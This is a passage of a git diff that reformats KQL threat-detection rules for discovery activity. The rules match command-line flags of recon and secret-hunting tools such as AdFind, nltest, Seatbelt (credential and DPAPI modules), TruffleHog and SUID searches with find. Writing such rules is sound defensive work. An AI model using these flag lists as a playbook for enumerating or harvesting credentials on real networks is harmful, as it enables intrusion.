+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate system administrator usage of these commands
+// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+
+DeviceProcessEvents | where ((ProcessCommandLine contains " -" and ProcessCommandLine contains "i") and (ProcessCommandLine contains " -" and ProcessCommandLine contains "d")) and ProcessCommandLine endswith " /" and FolderPath endswith "/ls"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql b/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql
index abd1bb78..7603ebc3 100644
--- a/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql
+++ b/KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql
@@ -1,10 +1,10 @@
-// Title: Potential Discovery Activity Using Find - Linux
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-28
-// Level: medium
-// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Potential Discovery Activity Using Find - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents | where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql b/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql
index 37b07f74..79eb20d4 100644
--- a/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql
+++ b/KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql
@@ -1,10 +1,10 @@
-// Title: Potential Discovery Activity Using Find - MacOS
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-28
-// Level: medium
-// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Potential Discovery Activity Using Find - MacOS
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects usage of "find" binary in a suspicious manner to perform discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-perm -4000" or ProcessCommandLine contains "-perm -2000" or ProcessCommandLine contains "-perm 0777" or ProcessCommandLine contains "-perm -222" or ProcessCommandLine contains "-perm -o w" or ProcessCommandLine contains "-perm -o x" or ProcessCommandLine contains "-perm -u=s" or ProcessCommandLine contains "-perm -g=s") and FolderPath endswith "/find"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql b/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql
index 7f254cfd..ed4a9c0d 100644
--- a/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql
+++ b/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Discovery Activity Via Dnscmd.EXE
-// Author: @gott_cyber
-// Date: 2022-07-31
-// Level: medium
-// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution
-// False Positives:
-// - Legitimate administration use
-
-DeviceProcessEvents
+// Title: Potential Discovery Activity Via Dnscmd.EXE
+// Author: @gott_cyber
+// Date: 2022-07-31
+// Level: medium
+// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution
+// False Positives:
+// - Legitimate administration use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql b/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql
index 56d503e2..6e9c3014 100644
--- a/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql
+++ b/KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql
@@ -1,10 +1,10 @@
-// Title: Potential GobRAT File Discovery Via Grep
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: high
-// Description: Detects the use of grep to discover specific files created by the GobRAT malware
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-
-DeviceProcessEvents
+// Title: Potential GobRAT File Discovery Via Grep
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects the use of grep to discover specific files created by the GobRAT malware
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "apached" or ProcessCommandLine contains "frpc" or ProcessCommandLine contains "sshd.sh" or ProcessCommandLine contains "zone.arm") and FolderPath endswith "/grep"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql b/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql
index 803abea3..d1a830fd 100644
--- a/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql
+++ b/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Recon Activity Using DriverQuery.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-19
-// Level: high
-// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers
-// MITRE Tactic: Discovery
-// Tags: attack.discovery
-// False Positives:
-// - Legitimate usage by some scripts might trigger this as well
-
-DeviceProcessEvents
+// Title: Potential Recon Activity Using DriverQuery.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-19
+// Level: high
+// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+// False Positives:
+// - Legitimate usage by some scripts might trigger this as well
+
+DeviceProcessEvents
 | where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql b/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql
index 48cc0519..357f8e77 100644
--- a/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql
+++ b/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Recon Activity Via Nltest.EXE
-// Author: Craig Young, oscd.community, Georg Lauenstein
-// Date: 2021-07-24
-// Level: medium
-// Description: Detects nltest commands that can be used for information discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1016, attack.t1482
-// False Positives:
-// - Legitimate administration use but user and host must be investigated
-
-DeviceProcessEvents
+// Title: Potential Recon Activity Via Nltest.EXE
+// Author: Craig Young, oscd.community, Georg Lauenstein
+// Date: 2021-07-24
+// Level: medium
+// Description: Detects nltest commands that can be used for information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1482
+// False Positives:
+// - Legitimate administration use but user and host must be investigated
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
index afcfebbf..dd870502 100644
--- a/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
+++ b/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
@@ -1,12 +1,12 @@
-// Title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
-// Author: blueteamer8699
-// Date: 2022-01-03
-// Level: medium
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
+// Author: blueteamer8699
+// Date: 2022-01-03
+// Level: medium
+// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql
index 7f46bb95..5ba453f0 100644
--- a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql
+++ b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - AdFind Suspicious Execution
-// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
-// Date: 2021-02-02
-// Level: high
-// Description: Detects AdFind execution with common flags seen used during attacks
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
-// False Positives:
-// - Legitimate admin activity
-
-DeviceProcessEvents
+// Title: PUA - AdFind Suspicious Execution
+// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
+// Date: 2021-02-02
+// Level: high
+// Description: Detects AdFind execution with common flags seen used during attacks
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
+// False Positives:
+// - Legitimate admin activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_adidnsdump_execution.kql b/KQL/rules/Discovery/pua_adidnsdump_execution.kql
index c8380722..7d6c2ec6 100644
--- a/KQL/rules/Discovery/pua_adidnsdump_execution.kql
+++ b/KQL/rules/Discovery/pua_adidnsdump_execution.kql
@@ -1,11 +1,11 @@
-// Title: PUA - Adidnsdump Execution
-// Author: frack113
-// Date: 2022-01-01
-// Level: low
-// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
-// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1018
-
-DeviceProcessEvents
+// Title: PUA - Adidnsdump Execution
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
+// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql b/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql
index 26f2dee9..4a0403e9 100644
--- a/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql
+++ b/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Advanced IP Scanner Execution
-// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
-// Date: 2020-05-12
-// Level: medium
-// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046, attack.t1135
-// False Positives:
-// - Legitimate administrative use
-
-DeviceProcessEvents
+// Title: PUA - Advanced IP Scanner Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
+// Date: 2020-05-12
+// Level: medium
+// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046, attack.t1135
+// False Positives:
+// - Legitimate administrative use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql b/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql
index 78716ab9..87166d63 100644
--- a/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql
+++ b/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql
@@ -1,13 +1,13 @@
-// Title: PUA - Advanced Port Scanner Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-12-18
-// Level: medium
-// Description: Detects the use of Advanced Port Scanner.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046, attack.t1135
-// False Positives:
-// - Legitimate administrative use
-// - Tools with similar commandline (very rare)
-
-DeviceProcessEvents
+// Title: PUA - Advanced Port Scanner Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: medium
+// Description: Detects the use of Advanced Port Scanner.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046, attack.t1135
+// False Positives:
+// - Legitimate administrative use
+// - Tools with similar commandline (very rare)
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_crassus_execution.kql b/KQL/rules/Discovery/pua_crassus_execution.kql
index bf5dfd90..9c3168fe 100644
--- a/KQL/rules/Discovery/pua_crassus_execution.kql
+++ b/KQL/rules/Discovery/pua_crassus_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Crassus Execution
-// Author: pH-T (Nextron Systems)
-// Date: 2023-04-17
-// Level: high
-// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.reconnaissance, attack.t1590.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: PUA - Crassus Execution
+// Author: pH-T (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.reconnaissance, attack.t1590.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql b/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql
index b700d762..f0fbeaa1 100644
--- a/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql
+++ b/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Nmap/Zenmap Execution
-// Author: frack113
-// Date: 2021-12-10
-// Level: medium
-// Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046
-// False Positives:
-// - Legitimate administrator activity
-
-DeviceProcessEvents
+// Title: PUA - Nmap/Zenmap Execution
+// Author: frack113
+// Date: 2021-12-10
+// Level: medium
+// Description: Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\nmap.exe" or FolderPath endswith "\\zennmap.exe") or (ProcessVersionInfoOriginalFileName in~ ("nmap.exe", "zennmap.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_seatbelt_execution.kql b/KQL/rules/Discovery/pua_seatbelt_execution.kql
index a439ff51..82d72f38 100644
--- a/KQL/rules/Discovery/pua_seatbelt_execution.kql
+++ b/KQL/rules/Discovery/pua_seatbelt_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Seatbelt Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-18
-// Level: high
-// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: PUA - Seatbelt Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
index c4f77b5c..bff4da4a 100644
--- a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
+++ b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
@@ -1,13 +1,13 @@
-// Title: PUA - SoftPerfect Netscan Execution
-// Author: @d4ns4n_ (Wuerth-Phoenix)
-// Date: 2024-04-25
-// Level: medium
-// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
-// It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046
-// False Positives:
-// - Legitimate administrator activity
-
-DeviceProcessEvents
+// Title: PUA - SoftPerfect Netscan Execution
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
+// It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
 | where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql b/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
index 99346fc1..469e6605 100644
--- a/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
+++ b/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
-// Author: frack113
-// Date: 2021-12-13
-// Level: high
-// Description: Detects active directory enumeration activity using known AdFind CLI flags
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.002
-// False Positives:
-// - Authorized administrative activity
-
-DeviceProcessEvents
+// Title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
+// Author: frack113
+// Date: 2021-12-13
+// Level: high
+// Description: Detects active directory enumeration activity using known AdFind CLI flags
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002
+// False Positives:
+// - Authorized administrative activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_trufflehog_execution.kql b/KQL/rules/Discovery/pua_trufflehog_execution.kql
index 4de2bd44..f5495cb2 100644
--- a/KQL/rules/Discovery/pua_trufflehog_execution.kql
+++ b/KQL/rules/Discovery/pua_trufflehog_execution.kql
@@ -1,14 +1,14 @@
-// Title: PUA - TruffleHog Execution
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-09-24
-// Level: medium
-// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
-// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
-// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
-// False Positives:
-// - Legitimate use of TruffleHog by security teams or developers.
-
-DeviceProcessEvents
+// Title: PUA - TruffleHog Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: medium
+// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
+// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
+// False Positives:
+// - Legitimate use of TruffleHog by security teams or developers.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\trufflehog.exe" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
index c1cfd9c1..719410cb 100644
--- a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
+++ b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql
@@ -1,14 +1,14 @@
-// Title: PUA - TruffleHog Execution - Linux
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-09-24
-// Level: medium
-// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
-// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
-// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
-// False Positives:
-// - Legitimate use of TruffleHog by security teams or developers.
-
-DeviceProcessEvents
+// Title: PUA - TruffleHog Execution - Linux
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: medium
+// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
+// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
+// False Positives:
+// - Legitimate use of TruffleHog by security teams or developers.
+
+DeviceProcessEvents
 | where FolderPath endswith "/trufflehog" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/python_initiated_connection.kql b/KQL/rules/Discovery/python_initiated_connection.kql
index e75ac528..bb3abc56 100644
--- a/KQL/rules/Discovery/python_initiated_connection.kql
+++ b/KQL/rules/Discovery/python_initiated_connection.kql
@@ -1,12 +1,12 @@
-// Title: Python Initiated Connection
-// Author: frack113
-// Date: 2021-12-10
-// Level: medium
-// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1046
-// False Positives:
-// - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying.
-
-DeviceNetworkEvents
+// Title: Python Initiated Connection
+// Author: frack113
+// Date: 2021-12-10
+// Level: medium
+// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying.
+
+DeviceNetworkEvents
 | where (InitiatingProcessFolderPath contains "\\python" and InitiatingProcessFolderPath contains ".exe") and (not(((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1") or (InitiatingProcessCommandLine contains "pip.exe" and InitiatingProcessCommandLine contains "install")))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
index eb4754c8..5ddcf479 100644
--- a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
